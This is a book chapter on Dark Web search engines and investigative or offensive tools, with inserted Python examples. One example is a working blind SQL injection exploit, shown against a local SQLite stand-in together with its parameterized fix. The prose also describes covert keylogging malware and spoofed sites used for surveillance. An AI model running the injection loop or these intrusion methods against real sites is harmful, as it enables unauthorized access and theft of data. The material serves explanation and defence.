CHAPTER 1

Introduction

Conversations in Cyberspace is a collection of insights and online conversations (both IRC chats and encrypted e-mails) on the current state of security and privacy in the online world, with a focus on the Deep Web. I have also included a brief introduction to some of the most used open-source intelligence (OSINT) tools and a selection of interviews with some of the key figures in industrial control systems (ICS), advanced persistent threat (APT) and hacker/hacktivist groups.

During the making of this short book, I quickly realized I had to include interviews and insights from both people involved in the defense side of security and hackers/“crackers” who enjoy the intellectual challenge of creatively overcoming the limitations and restrictions of software systems to achieve novel and unexpected outcomes.

The picture that emerges is a fascinating scenario in which cyberspace is becoming remarkably similar to the “physical space”: an increasing number of people, groups and organizations are concerned about privacy, trust and the information they share, and they promote these concerns both on the “clearnet” and on the so-called “deep web.”

This book aims to be an introduction to the relationships between security, open source intelligence and the vast and complex world hiding in the deep web, for both the security professional and the system administrator interested in exploring today's concerns in database design, privacy and security by design.

Offensive Security, the team that developed Kali Linux, one of the most popular penetration-testing operating systems, cleverly summarizes the hacking spirit with the quote “the quieter you become, the more you can hear,” borrowed from the 13th-century Persian poet Jalāl ad-Dīn Muhammad Rumi.

October 31, 2018, Europe

Search Engines

Finding information on the Dark Web is not difficult. There are lists of Dark Web sites, and there are Dark Web search engines. The Onion sites returned in their results, however, present challenges not found in a Bing or Google results list.

The websites may be temporarily offline, a frequent problem with Dark Web Onion sites. Latency can make entering a query, obtaining results, and visiting a site from the results list time-consuming; Google-like response time is the exception.

The rule is to allocate sufficient time for Tor's sluggishness. Additionally, the sites in the results list may be operated by law enforcement or an intelligence entity.

If a Dark Web site looks too good to be true, approach it with caution: registering or downloading content can let malware onto your computer.

We reiterate these warnings because most Bing and Google users are conditioned to enter a question, scan the results list, and visit websites confident that problematic destinations have been filtered out.

Searching the Dark Web requires a more careful mindset. Keep in mind that you can use your sandboxed computing device to access both Surface Web and Dark Web sites.

Hidden Wiki

Among the easy-to-find “navigator” services for the Dark Web is the Hidden Wiki. With Tor up and running, enter the URL http://thehiddenwiki.org/ and click on a link; the selected Dark Web site will open in the Tor Browser.

The site will display if it is online. Delays for some Tor functions may be 50 seconds or more.

The Hidden Wiki provides Onion links to chosen Dark Web sites in various categories.

The Hidden Wiki is another starting point for Dark Web surfing. If a website does not resolve, you will have to try again later. You may also use the Pastebin lookup methods described in the previous chapter to find out whether a new Onion address has been posted. If the Hidden Wiki does not respond, an alternative directory is TorLinks at https://torlinkbgs6aabns.onion.

This website features similar categories and a similar number of listings. If you are interested in participating in Dark Web forums, you can use the list of discussion groups to learn the conventions of Dark Web services. The study team found that one has to build a relationship with the community of each forum. Some forums have a crowd-sourced score, like the consumer ratings on eBay or Amazon; the methods vary by forum.

Ahmia

The Ahmia search system can be queried without the Tor software installed; however, to visit a site from its results you will need your Tor-equipped computing device. The Surface Web URL is https://ahmia.fi; the Onion address was http://msydqstlz2kzerdg.onion. The Ahmia code is an open source project with a repository on GitHub.

Ahmia, operated from Finland, bills itself as a “search engine for services resident on the Tor anonymity network.”

The system does not keep IP address logs, and it filters its results to remove child abuse links.

The system is integrated with GlobaLeaks and Tor2web.

The system was created by Juha Nurmi, chief executive of the Finnish company Dignify Ltd. (https://dignify.fi). Dignify offers data mining and cyber security research, providing information about drug markets and other law enforcement issues.

At the top of the splash screen is a link to “Statistics.” The information, when available, is helpful. The index contains links to about 5,000 Dark Web sites. Ahmia was a 2014 Google Summer of Code project whose goal was to improve the Ahmia system.

In July 2015, Ahmia published a list of websites set up to imitate “real” Dark Web sites and capture the traffic intended for them. In the summer of 2016, Ahmia was offline more than it was online.

Grams

Grams is located at http://grams7enufi7jmdl.onion. One enthusiast described Grams as “the Google of the Dark Web.” In a 2014 interview, a Grams administrator said Grams uses proprietary search technology that displays results from e-commerce sites as well as other kinds of Dark Web sites.

Users can submit websites to Grams for indexing and inclusion in the system.

Grams does not index child pornography. The service is operated by what appears to be an Eastern European digital currency service. Grams offers unique features; for instance, a vendor and product search, and the user-friendly Flow, which lets a user locate a specific Dark Web site using plain English. In 2015, the study team used Grams to search for Pappy Van Winkle whiskey after a major shipment was stolen.

The lack of relevance underscored the problems Grams poses for an investigator.

Grams does a fantastic job of pointing a researcher to complete, free books available on Dark Web sites.

The service does an excellent job of indexing drug-related sites. With the Flow service, it is easy to locate a specific Dark Web site provided that the investigator knows the title of the site.

I have found that Grams was able to yield useful results, but its inclusion of irrelevant, off-topic results made manual inspection of the result pages necessary. Used in concert with other Dark Web search systems, Grams is acceptable.

Not Evil

Not Evil, located at https://hss3uro2hsxfogfq.onion, is a re-branding of TorSearch and Evil Wiki. The links are filtered, and the relevance algorithm takes into consideration what users click on. Not Evil's operator keeps a low profile, and the service does not accept Dark Web advertising. Not Evil includes a “chat” function usable from inside Tor: a user can start a secure conversation about a query either with another anonymous Not Evil user or with a chatbot named “Ned,” short for Not Evil Drone. Along with the results, the system displays the number of indexed items that match the query and the total number of links it has indexed. Finally, Not Evil provides an application programming interface so that its functionality can be integrated into other applications.

Onion Link

Onion Link can be found at http://onion.city. What makes this Dark Web search system interesting is that it appears to use the Google Custom Search function together with the Ahmia index to produce its results. The index comprises links to approximately 20,000 Dark Web sites, based on the study team's analysis of Onion Link search results. About six years ago, Google operated a Dark Web site; that site was later taken offline, and since then Google has not revealed information about its Dark Web activities. Google did invest in Recorded Future, a company which indexes Dark Web content. One hypothesis the study team devised was that Google might index some Dark Web content for its own research and to support the work of the Google-backed Recorded Future. In late 2016, Google's indexing of “glue” websites decreased, based on our evaluation queries.

Torch

The Torch search system presents a search box, Dark Web advertising, and a link for people wanting to advertise on Torch. At the time of the study team's capture, Torch reported that its index contained about 500,000 Dark Web pages, about one-third fewer than other Dark Web engines. Torch is one of the lower-profile Dark Web search programs. One useful feature is term highlighting; the relevancy score produced by the search system makes it easy to spot the frequency of the terms in the indexed site. Results list entries show the date on which the Torch indexing subsystem visited a site. Torch can be useful; we recommend using it from inside a sandbox.

Free Search Methods

Free Dark Web search methods provide convenient, easy access to many Dark Web sites. However, none of the systems is without serious shortcomings. The approach I have developed involved crafting a query and then running that query on the five search systems discussed in this chapter. I then downloaded the first five sets of results and merged them. I then visited the Dark Web sites which seemed to be most relevant to the specific issue we were investigating. What is obvious is that the time and effort needed to carry out manual queries and results analysis was a burden. There are commercial Dark Web search systems available to law enforcement, security, and intelligence professionals. Commercial Dark Web search services from Digital Shadows, Recorded Future, and other businesses provide more useful, timely, and accurate Dark Web search results.
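The merge step described above is the part that repays a little automation. The following is an added example (not code from the book or from any of the search engines it discusses) of how to collapse the first few result pages from several engines into one ranked list: every URL is reduced to its bare .onion host so that http/https, paths and www. prefixes do not count as different sites, clearnet and malformed links are dropped, and hosts are ordered by how many engines returned them and then by the best rank any engine gave them. The engine names and the result URLs in SAMPLE are constructed for illustration; only the address format is realistic.

```python
import re
from urllib.parse import urlsplit

# v2 addresses are 16 base32 characters, v3 addresses are 56; both end in .onion
ONION_HOST = re.compile(r"^(?:[a-z2-7]{16}|[a-z2-7]{56})\.onion$")


def canonical_onion(url):
    """Return the bare .onion host for a result URL, or None if it is not an Onion link.

    Engines return the same service as http://, https://, with a path, with a
    trailing slash or under a subdomain; all of those collapse to one host.
    """
    url = url.strip()
    if "://" not in url:
        url = "http://" + url          # bare hosts copied from a directory page
    host = (urlsplit(url).hostname or "").lower()
    labels = host.split(".")
    if len(labels) > 2:                # drop subdomains such as www.
        host = ".".join(labels[-2:])
    return host if ONION_HOST.match(host) else None


def merge_results(per_engine, top_n=5):
    """Merge the first top_n results from each engine into one ranked list.

    per_engine maps an engine name to its ordered result URLs. Each output row is
    (host, agreement, best_rank, engines), sorted so that hosts returned by more
    engines come first, with ties broken by the best rank any engine gave the host.
    """
    seen = {}
    for engine, urls in per_engine.items():
        for rank, url in enumerate(urls[:top_n], start=1):
            host = canonical_onion(url)
            if host is None:
                continue               # clearnet or malformed link: not an Onion result
            entry = seen.setdefault(host, {"engines": set(), "best_rank": rank})
            entry["engines"].add(engine)
            entry["best_rank"] = min(entry["best_rank"], rank)
    rows = [(host, len(e["engines"]), e["best_rank"], sorted(e["engines"]))
            for host, e in seen.items()]
    rows.sort(key=lambda r: (-r[1], r[2], r[0]))
    return rows


# Constructed sample results: the hosts are made up, only the format is realistic.
SAMPLE = {
    "ahmia": ["http://abcdefghijklmnop.onion/", "http://qrstuvwxyz234567.onion/forum",
              "https://example.com/not-an-onion"],
    "torch": ["http://qrstuvwxyz234567.onion", "http://www.abcdefghijklmnop.onion/index",
              "http://" + "z" * 16 + ".onion/"],
    "not evil": ["ABCDEFGHIJKLMNOP.onion", "http://tooshort.onion/"],
}

if __name__ == "__main__":
    for host, agreement, best, engines in merge_results(SAMPLE):
        print(f"{agreement}/{len(SAMPLE)} engines, best rank {best}: {host} {engines}")
```

Agreement between independent indexes is a cheap relevance signal on the Dark Web, where no engine sees more than a fraction of the live sites; a host that three engines put on their first page is worth a Tor circuit before one that only a single engine returned in position five.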

Deep Web Tools

Software like operating systems and popular applications like Web browsers have defects. Attackers can use these defects to install software on a computing device.

The software can arrive in a downloadable file such as an image or a document.

Other malware (the general term for malicious software) offers to install a program, a file, or an image that carries a payload; that is, malicious code the unsuspecting user knows nothing about. The malware compromises the user's computing device or a server. The capabilities of exploits and malware are becoming broader and are evolving quickly.

One reason is that compromising a user's computer before the data are encrypted sidesteps the barrier of having to decrypt them afterwards. Additionally, software on a user's computer or on a Dark Web site's server makes intercepting traffic easier and eliminates the need for physical access to the user's device.

Terminology can be confusing. Hacking tools are variously called security suites, penetration testing (pentest) software, or malware.

Whatever their label, many of these hacking tools in the hands of a programmer can shine a bright light on Dark Web activities.

The software can be used in many ways. The study team has identified three widely used approaches to the use of hacking tools.

Depending on the resources available to an investigative team, the specific solution implemented can include software created by a team member or the department. In several organizations, exploit tools are licensed from vendors.

The researchers can deploy the software, often working with the vendor's engineering team. In some instances, a department or investigative team may contract with a third-party firm such as Northrop Grumman or BAE Systems to do the work. Malware takes many forms.

Many Deep Web/Dark Web passive collection methods and tools are available. These range from placing the needed code within a computer's operating system or applications to putting malware into the firmware of the computing device. Although the latter is more laborious, such malware cannot be removed or disabled even if the device's storage is erased and a fresh copy of the operating system installed.

A covert surveillance technique is to install the malware during a Dark Web session. Many Dark Web users assume their Tor or I2P surfing cannot be compromised; that is incorrect. Once the malware is on the user's computer, it can intercept and transmit the Dark Web user's information. That information is sent over the Surface Web, which avoids any requirement for special Dark Web software on the user's computing device. Once installed, the malware does its work invisibly and without changing the bad actor's computer in any readily visible way. The advantage of this approach to surveillance is that encryption poses no problem for the investigator: the malware captures the user's keystrokes before anything is encrypted and saves them in the clear. An investigator can recreate or “watch” a Dark Web user's session. Some malware allows the investigator to start an e-mail, send messages, and initiate transactions without the Dark Web user's knowledge.

The “spoofing” technique is a collection method based on an investigator operating a Dark Web or Surface Web site. We use the term “spoofing” to refer to an exploit or set of exploits designed to trick a Dark Web user into visiting a Dark Web site operated by researchers, or into supplying data to an application or form created by law enforcement to capture personal details. Many variations exist, and new ones are regularly introduced. The data entered into the spoofed or captured site are available to the investigator in real time and in unencrypted form. Which Dark Web sites are operated by law enforcement, and which by bad actors? The research team obtained a list of about 150 Dark Web sites that exist in more than one form; a captured site may be kept online under a different Onion address. One strategy is to request a primary and secondary e-mail address, a phone number, or a primary and alternate shipping address for orders placed via the site run by law enforcement. More sophisticated methods involve creating mobile applications which appear to be Dark Web applications.

The “multiple exploits method” makes use of a Dark Web site under the control of the investigative team, different infection vectors (forms, applications, e-mail, and so on), and malware that may spread from a bad actor's computer to that of another person known to the bad actor.

Hybrid methods can use applications which spread through networks. This approach may combine remote-access management of the bad actor's computing device with software designed to perform specific actions when the user of the compromised device is using Signal, an encrypted messaging program, or producing videos for distribution and sale.

If the compromised computer is used to host a Dark Web site, the malware can insert itself into the host server and perform specific actions on that remote server. Combined methods make it possible for an investigator to gain access to one or more servers on a network and obtain information germane to a violation of the law across two or more computing devices and their networks.

Citadel

Citadel is an example of a software bundle which includes many features for compromising a Dark Web user's computer. In 2012, according to Seculert, Citadel's developers offered a variant of the Zeus Trojan as software-as-a-service. Citadel is significant because it is an example of an exploit kit that operates from the cloud. The shift to cloud-based tools brings many benefits, including rapid scaling when an exploit succeeds and the use of digital currencies to help obscure who the customer of the exploit is. Citadel also contains a social network component.

Citadel customers can contribute new code modules, submit bug reports, and discuss technical issues with other Citadel users. For law enforcement and intelligence specialists to take advantage of Citadel, technical expertise and experience with the software are crucial. Citadel offers different encryption choices.

The software requires a specific botnet key to download malware updates and configuration files, in an effort to avoid discovery by trackers. Citadel also blocks attempts to download anti-virus and anti-malware tools.

ElcomSoft

Established in 1990, ElcomSoft Co. Ltd is a privately owned company headquartered in Moscow, Russia. Since 1997, ElcomSoft has been actively developing solutions for the digital forensics and IT security businesses.

Today, the company maintains a wide range of mobile and computer forensic tools, corporate security, and IT audit products. ElcomSoft products are used by several Fortune 500 corporations, multiple branches of militaries all over the world, police departments, governments, and major accounting firms. A complete suite of ElcomSoft password recovery tools enables corporate and government customers to unprotect disks and systems and decrypt files and documents protected with widely used software. ElcomSoft's password recovery applications are fast, but speed depends on the computer itself and other factors.

The password recovery software makes it easier to access password-protected files in Microsoft Office, Adobe PDF, ZIP, and RAR formats. Like most high-end video processing and gaming applications, ElcomSoft uses the video card's graphics processing unit to accelerate some calculations. With the computational load shared between the CPU and the GPU, the time required to recover a password for a protected file is reduced. In addition to the password recovery tools, ElcomSoft offers a Forensic Disk Decryptor, which gives investigators a fast, easy way to access encrypted data stored in crypto containers created by BitLocker, PGP, and TrueCrypt (now discontinued). The tool can decrypt the entire content of an encrypted volume, or mount the volume as a drive letter in unlocked, unencrypted mode. In either case it needs the volume's key material, whether from the password itself or from a memory dump or hibernation file captured while the volume was mounted; it does not break the cipher.

EnCase

EnCase has become one of the go-to forensic solutions for a seized device or computer. The program makes it possible for investigators to acquire data and create reports from a wide assortment of devices. EnCase Forensic includes a search function that makes it easy to ascertain whether particular information is on a device, and it can gather information from a range of sources; for example, Webmail, chat sessions, backup files, encrypted files, and smartphones and tablets.

A programmer can use the EnCase scripting language, EnScript, to automate processes. Search, investigation and other labor-intensive tasks can be customized with EnScript, which resembles Java or C++. EnCase Forensic generates evidence file formats accepted in US courts and validates the integrity of the evidence collected. The system supports most common file systems and operating systems, and it integrates with optional modules for processing virtual file systems and performing decryption tasks.

Kali Linux

Kali includes over 300 pre-installed tools. Combined with Metasploit, discussed below, an investigator with the appropriate computer skills can compromise Dark Web users and then make additional inroads into a suspect's computer, storage, or mobile device.

Techniques applicable to law enforcement and intelligence work include SQL injection and denial-of-service attacks, among others.

SQL injection is a type of web application security vulnerability in which an attacker can submit input that the Web application executes as part of a database SQL command, exposing the back-end database. Kali allows manual methods when access to a user's computer or a server is possible, and it ships SQLMap, another open source tool, for mounting the attack. SQLMap automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

Data retrieval from the database and access to the underlying file system are supported. Kali may also be used for blind SQL injection, in which the application returns no data directly and the attacker infers one bit per request from a yes/no difference in the response. In this approach, one first decides whether a Dark Web site is vulnerable to SQL injection. If it is, a programmer can probe the website to find the database's tables, columns, and records: once a probe returns a positive result, the programmer can write scripts that iterate through the possibilities. Code samples are provided to assist the programmer in using Kali as a platform for blind SQL injection against a single Web site or a group of Web sites of interest to the investigator.
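The following is an added, self-contained illustration of the blind technique just described; it is not the book's code, nor SQLMap's. An in-memory SQLite database stands in for the site's back end, vulnerable_user_exists() stands in for a page whose only visible behaviour is “row found / no row” (the constructed user names and hash values are made up), and the attack side turns that single bit into a string one character at a time: it first confirms the input is interpreted as SQL, then learns a table name from the catalogue, then extracts a value from it with a binary search over each character's code point. The parameterized safe_user_exists() is the fix.

```python
import sqlite3

STATS = {"requests": 0}   # how many yes/no requests the blind attack needed


def build_db():
    """Constructed stand-in for a site's back-end database (names and hashes made up)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT);
        INSERT INTO users(name, pw_hash) VALUES ('admin', 'f0e1d2c3b4a5968778695a4b3c2d1e0f');
        INSERT INTO users(name, pw_hash) VALUES ('alice', 'deadbeef0badf00d1234567890abcdef');
    """)
    return conn


def vulnerable_user_exists(conn, username):
    """VULNERABLE: the username is concatenated into the SQL text. The caller only
    learns whether a row came back, but one bit per request is all a blind attack needs."""
    STATS["requests"] += 1
    sql = "SELECT id FROM users WHERE name = '" + username + "'"
    return conn.execute(sql).fetchone() is not None


def safe_user_exists(conn, username):
    """Fixed version: a bound parameter is data and is never parsed as SQL."""
    return conn.execute("SELECT id FROM users WHERE name = ?", (username,)).fetchone() is not None


def oracle(conn, condition):
    """Boolean oracle built on the vulnerable lookup. A known-good name anchors the
    row; the trailing '--' comments out the closing quote the application appends."""
    return vulnerable_user_exists(conn, "admin' AND (" + condition + ") -- ")


def looks_injectable(conn):
    """Step one from the text: a true and a false condition must behave differently."""
    return oracle(conn, "1=1") and not oracle(conn, "1=2")


def extract(conn, subquery, max_len=64):
    """Recover the string `subquery` returns: its length first, then a binary search
    over the code point of each position (7 requests per character for ASCII)."""
    length = next((n for n in range(max_len + 1)
                   if oracle(conn, f"length(({subquery})) = {n}")), None)
    if length is None:
        return None
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 0x7F                  # printable ASCII; widen for non-ASCII data
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo():
    """Enumerate a table name from the catalogue, then pull a secret from that table."""
    STATS["requests"] = 0
    conn = build_db()
    if not looks_injectable(conn):
        return None
    table = extract(conn, "SELECT name FROM sqlite_master WHERE type = 'table' LIMIT 1")
    secret = extract(conn, f"SELECT pw_hash FROM {table} WHERE name = 'alice'")
    return table, secret, STATS["requests"]


if __name__ == "__main__":
    print(demo())   # ('users', 'deadbeef0badf00d1234567890abcdef', 300)
```

Three hundred requests for a table name and a 32-character hash is the point of the exercise: against a real site each request is one HTTP round trip, and over Tor that is minutes rather than seconds, which is why tools such as SQLMap spend effort on request reduction and why defenders should treat a burst of near-identical requests that differ only in a numeric comparison as a signature of this attack. The catalogue query would be information_schema.tables on MySQL or PostgreSQL rather than sqlite_master; the loop is otherwise the same.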

Maltego

Maltego analyzes relationships and displays them in a way that allows a bird's-eye view of individuals, companies, events, and other entities. The essential notion is that visualizing relationships allows the investigator or analyst to look at information and its interconnections. Instead of poring over a table of numbers, the Maltego user can spot potentially significant items in chunks of information; for example, linking a telephone number with an e-mail address. Maltego is free for individual users, and the commercial license fees are a fraction of those for systems available from BAE, IBM, and other firms. You may have seen high-impact visualizations of this kind, such as sentiment analyses of Twitter messages.

Maltego processes text to recognize and tag entities such as a domain name, an individual, a company, a phone number, or an e-mail address. The Maltego system uses “transforms” (procedures which relate entities of one type to entities of another type). The outputs provide an intuitive, speedy way to locate specific information, see important connections and research individuals who access the Dark Web. The system can, for instance, extract from content the personal e-mail addresses of people working at a particular government agency.

Metasploit

Metasploit is a collection of hacking software built around the open source Metasploit Framework.

The tool contains hundreds of modules (software components). Remote exploit modules allow the Metasploit user to develop attacks that exploit vulnerabilities in browsers, operating systems, and third-party applications like Adobe Flash. The FBI's Operation Torpedo tool was derived from Metasploit's Decloaking Engine. The approach appears to have used Adobe's Flash plugin to make the target's browser open a direct connection over the Web; that is, outside of Tor. This connection became a pathway for the FBI to collect information about a user, in particular the real IP address.

Nmap

Nmap, or Network Mapper, is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

Nmap runs on Linux, Windows, and Mac OS X. It ranked among the top 10 programs in the Freshmeat.net repository, which contained more than 30,000 programs. The primary goals of the Nmap Project are to help make the Internet a little more secure and to supply administrators, auditors and hackers with an advanced tool for exploring their networks. Because the complete source code is available, developers can modify Nmap to perform more specialized functions. Nmap uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems (and OS versions) they are running, what types of packet filters/firewalls are in use, and dozens of other characteristics.

The Nmap suite includes the command-line Nmap executable as well as a graphical user interface and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

Nmap is flexible: it supports dozens of advanced techniques for mapping out networks full of IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP and UDP), operating system detection, version detection, ping sweeps, and much more. Nmap has been used to scan large networks spanning hundreds of thousands of machines. Nmap is one of the more thoroughly documented security tools.

A reference guide, tutorials and white papers are available, as well as a developer mailing list (nmap-dev) and the #nmap channel on Freenode and EFNet.
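For the inventory and uptime-monitoring uses mentioned above, the practical habit is to run Nmap with -oX and keep the XML rather than screen output. The following is an added example (not part of the book, and not code from the Nmap project) that parses that XML into a per-host port inventory and then does what Ndiff does for two scans a day apart: reports every port whose state or service banner changed. The two scan documents are constructed here to stand in for real -oX files; the host, hostname and service versions in them are invented.

```python
import xml.etree.ElementTree as ET

HOST_TEMPLATE = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX - 10.0.0.5">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <hostnames><hostname name="srv01.internal" type="PTR"/></hostnames>
    <ports>{ports}</ports>
  </host>
</nmaprun>
"""

# Constructed port findings for two scans of the same (invented) host, a day apart.
PORTS_MONDAY = """
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.2p1"/></port>
      <port protocol="tcp" portid="443"><state state="open" reason="syn-ack"/>
        <service name="http" product="nginx" version="1.18.0" tunnel="ssl"/></port>
      <port protocol="tcp" portid="3306"><state state="filtered" reason="no-response"/>
        <service name="mysql"/></port>
"""
PORTS_TUESDAY = """
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.2p1"/></port>
      <port protocol="tcp" portid="443"><state state="open" reason="syn-ack"/>
        <service name="http" product="nginx" version="1.18.0" tunnel="ssl"/></port>
      <port protocol="tcp" portid="3306"><state state="open" reason="syn-ack"/>
        <service name="mysql" product="MySQL" version="5.7.33"/></port>
      <port protocol="tcp" portid="8080"><state state="open" reason="syn-ack"/>
        <service name="http-proxy"/></port>
"""
SCAN_MONDAY = HOST_TEMPLATE.format(ports=PORTS_MONDAY)
SCAN_TUESDAY = HOST_TEMPLATE.format(ports=PORTS_TUESDAY)


def parse_nmap_xml(xml_text):
    """Turn nmap -oX output into {address: {(proto, port): (state, service)}},
    keeping only hosts that nmap marked as up."""
    inventory = {}
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:                       # IPv6-only host: take whatever address is there
            addr_el = host.find("address")
        ports = {}
        for port in host.iter("port"):
            state = port.find("state").get("state")
            svc = port.find("service")
            service = "" if svc is None else " ".join(
                v for v in (svc.get("name"), svc.get("product"), svc.get("version")) if v)
            ports[(port.get("protocol"), int(port.get("portid")))] = (state, service)
        inventory[addr_el.get("addr")] = ports
    return inventory


def open_ports(inventory):
    """Inventory view: the open (proto, port) pairs per host, sorted by port."""
    return {addr: sorted(k for k, (state, _) in ports.items() if state == "open")
            for addr, ports in inventory.items()}


def diff_scans(before, after):
    """Ndiff-style comparison: every (host, proto, port) whose state or service
    banner changed; 'absent' marks a port one of the scans did not report at all."""
    absent = ("absent", "")
    changes = []
    for addr in sorted(set(before) | set(after)):
        b, a = before.get(addr, {}), after.get(addr, {})
        for key in sorted(set(b) | set(a)):
            old, new = b.get(key, absent), a.get(key, absent)
            if old != new:
                changes.append((addr, key[0], key[1], old, new))
    return changes


if __name__ == "__main__":
    monday, tuesday = parse_nmap_xml(SCAN_MONDAY), parse_nmap_xml(SCAN_TUESDAY)
    print("open on Monday:", open_ports(monday))
    for addr, proto, port, old, new in diff_scans(monday, tuesday):
        print(f"{addr} {port}/{proto}: {old} -> {new}")
```

A database port that goes from filtered to open, or a new listener on 8080, is exactly the kind of change that a one-off scan never surfaces and a daily diff does; the same comparison, run against a known-good baseline, is a cheap way to notice when a seized or monitored machine starts serving something it did not serve before.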

Open source software is free and supported by a community of users and developers. There are some Dark Web-related applications on GitHub and SourceForge, and you will find freelance programming services which make programmers with hacking experience available for hire. A helpful list of Dark Web-centric software was compiled for public access by the Defense Advanced Research Projects Agency (DARPA).

DARPA

The DARPA list is at http://open-catalog.darpa.mil/MEMEX.html. The software was created by researchers, universities, individuals, and commercial organizations. It was not designed to be downloaded and used as an app on an Android or iPhone device; in most cases, the user was assumed to be a programmer.

The programs or their constituent elements are no longer publicly available for download via the DARPA Memex directory page. If you find one of the Memex apps, you have the task of assembling the code into operational programs or weaving a module into another piece of software. In Annex 1 to this study, we provide a listing of some of the DARPA Dark Web software through mid-2016. The majority of the programs were part of DARPA's attempt to create a Google-type search system for Dark Web content.

The Memex project was in its third year in 2016, and detailed information regarding the program is not generally available; the data which are available on the Surface Web are fragmentary.

A few of the apps from the 2016 DARPA directory include Dossier Stack, Formasaurus and HSProbe.

Dossier Stack is smart software delivered in the form of a library. A program taps into the library to perform certain entity-centric operations. Entities can include people, places, names of businesses, aliases, and other key signifiers. Dossier Stack enables a programmer to construct active search applications which learn what users need by monitoring and capturing their actions. The developer's commercial software makes it possible to mine vast flows of information and connect entities using probabilistic inference algorithms. The developer is Diffeo, a startup founded in 2012 that draws on experience from MIT and from MetaCarta founder John Frank. One area of interest for the firm is scraping the Web and creating knowledge graphs for unique entities; the idea is to refine, in a more educated way, the relationships among people, places, organizations, and named things. Diffeo integrates Basis Technology's language tools and uses SAP's in-memory database technology.

Formasaurus is a software component which provides information about the forms on a Web page. The Python package decides whether a form is a login, search, registration, password recovery, mailing list, or contact form. The classifier is built with machine learning, so its precision improves as it is trained on more examples. Hyperion Gray is the developer of additional Memex modules, including Frontera (a Web-crawl prioritization routine) and Scrapy-Dockerhub, a component for managing crawling and indexing programs.

HSProbe (Tor Hidden Service Prober) is a multithreaded Python application. The software makes use of Stem, a Python controller library for Tor. Stem lets a program use Tor's control protocol to script against the Tor process, or build components which can determine the status of Tor hidden services and fetch hidden service descriptors. HSProbe was designed to use protocol error codes to decide what action to take when a hidden service cannot be reached. HSProbe tests whether the specified Tor hidden services (Onion addresses) are listening on any of a range of pre-specified ports.
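Two things make a probe of this kind cheaper and more reliable than simply throwing a list of addresses at Tor, and the added example below shows both. It is not HSProbe's code and does not use Stem; it is illustration only, using the standard library. First, a v3 Onion address carries a two-byte checksum and a version byte inside its 56 base32 characters, so a mistyped, truncated or invented address can be rejected offline before any circuit is built (the v2 form, 16 characters, can only be checked syntactically). Second, the connect request is sent to Tor's SOCKS5 port with the hostname inside the request, so the .onion name is never resolved through ordinary DNS, and Tor's one-byte reply code is what tells you whether the service was reachable. The proxy address 127.0.0.1:9050 is Tor's default; the public key used in the test is an arbitrary 32-byte value, not a real service key.

```python
import base64
import hashlib
import socket

B32_ALPHABET = set("abcdefghijklmnopqrstuvwxyz234567")


def v3_address_from_pubkey(pubkey):
    """Derive a v3 .onion address from a 32-byte ed25519 public key using the
    rend-spec-v3 rule: base32(PUBKEY | CHECKSUM | VERSION), where
    CHECKSUM = SHA3-256(".onion checksum" | PUBKEY | VERSION)[:2] and VERSION = 0x03."""
    version = b"\x03"
    checksum = hashlib.sha3_256(b".onion checksum" + pubkey + version).digest()[:2]
    return base64.b32encode(pubkey + checksum + version).decode("ascii").lower() + ".onion"


def onion_version(address):
    """Return 2 or 3 for a well-formed Onion address, else None. A v2 name (16
    chars) can only be checked syntactically; a v3 name (56 chars) carries a
    checksum and version byte, so a mistyped or truncated one is rejected here
    without spending a single Tor circuit on it."""
    host = address.strip().lower()
    if not host.endswith(".onion"):
        return None
    label = host[:-len(".onion")].rsplit(".", 1)[-1]     # drop any subdomain prefix
    if not label or any(c not in B32_ALPHABET for c in label):
        return None
    if len(label) == 16:
        return 2
    if len(label) != 56:
        return None
    raw = base64.b32decode(label.upper())               # 56 chars -> 35 bytes, no padding
    pubkey, checksum, version = raw[:32], raw[32:34], raw[34:]
    if version != b"\x03":
        return None
    expected = hashlib.sha3_256(b".onion checksum" + pubkey + version).digest()[:2]
    return 3 if checksum == expected else None


def probe_onion(host, port, proxy=("127.0.0.1", 9050), timeout=60):
    """Ask the local Tor SOCKS5 port to open a TCP connection to host:port and
    return the SOCKS reply code (0 = connected; anything else = Tor could not).
    The name travels inside the SOCKS request, so it is never resolved via DNS."""
    with socket.create_connection(proxy, timeout=timeout) as sock:
        sock.sendall(b"\x05\x01\x00")                    # SOCKS5, one method: no auth
        if sock.recv(2) != b"\x05\x00":
            raise ConnectionError("Tor SOCKS port rejected the handshake")
        request = (b"\x05\x01\x00\x03" + bytes([len(host)]) + host.encode("ascii")
                   + port.to_bytes(2, "big"))            # CONNECT, ATYP = domain name
        sock.sendall(request)
        reply = sock.recv(10)
        return reply[1] if len(reply) >= 2 else None


def probe_list(addresses, ports=(80, 443)):
    """HSProbe-style loop: reject malformed names offline, probe the rest via Tor."""
    results = {}
    for address in addresses:
        if onion_version(address) is None:
            results[(address, None)] = "malformed"
            continue
        for port in ports:
            try:
                results[(address, port)] = probe_onion(address, port)
            except OSError as exc:                      # no Tor running, timeout, and so on
                results[(address, port)] = f"proxy error: {exc}"
    return results
```

Because the version byte is fixed at 0x03, every valid v3 address ends in the letter d; a list entry that does not is wrong before you look any further. The timeout of a minute matches the delays described earlier in this chapter, and a non-zero reply code is worth recording rather than discarding: it is the difference between a service that is gone and one that merely did not answer this time.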

